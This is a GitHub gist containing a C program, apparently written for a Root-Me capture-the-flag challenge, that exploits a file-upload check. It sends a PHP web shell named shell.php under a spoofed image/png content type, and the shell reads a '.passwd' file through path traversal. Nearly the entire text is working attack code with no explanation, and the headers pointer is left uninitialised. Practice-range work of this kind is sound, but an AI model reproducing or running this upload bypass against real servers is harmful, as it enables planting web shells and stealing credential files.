Skip to content

Instantly share code, notes, and snippets.

@emandret emandret/pwned.c
Created Oct 14, 2018

Embed
What would you like to do?
MIME type upload exploit
#include <curl/curl.h>
#include <stdio.h>
int main(void)
{
/* Initialize request with curl */
CURL *req = curl_easy_init();
if (!req) {
fprintf(stderr, "Error: curl initialization failed");
return 1;
}
/* Define the request as HTTP POST for form request */
curl_easy_setopt(req, CURLOPT_CUSTOMREQUEST, "POST");
curl_easy_setopt(req,
CURLOPT_URL,
"http://challenge01.root-me.org/web-serveur/ch21/?action=upload");
/* Set the headers */
struct curl_slist *headers;
headers = curl_slist_append(headers,
"Content-Type: multipart/form-data; "
"boundary=PWNED");
curl_easy_setopt(req, CURLOPT_HTTPHEADER, headers);
/* Store the cookies response */
curl_easy_setopt(req, CURLOPT_COOKIEJAR, "cookies.txt");
/* Set the form data */
curl_easy_setopt(req,
CURLOPT_POSTFIELDS,
"--PWNED\r\n"
"Content-Disposition: form-data; name=\"file\"; "
"filename=\"shell.php\"\r\n"
"Content-Type: image/png\r\n\r\n"
"<?php echo file_get_contents('../../../.passwd'); ?>\r\n"
"--PWNED--");
/* Perform the request and cleanup */
curl_easy_perform(req);
curl_easy_cleanup(req);
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.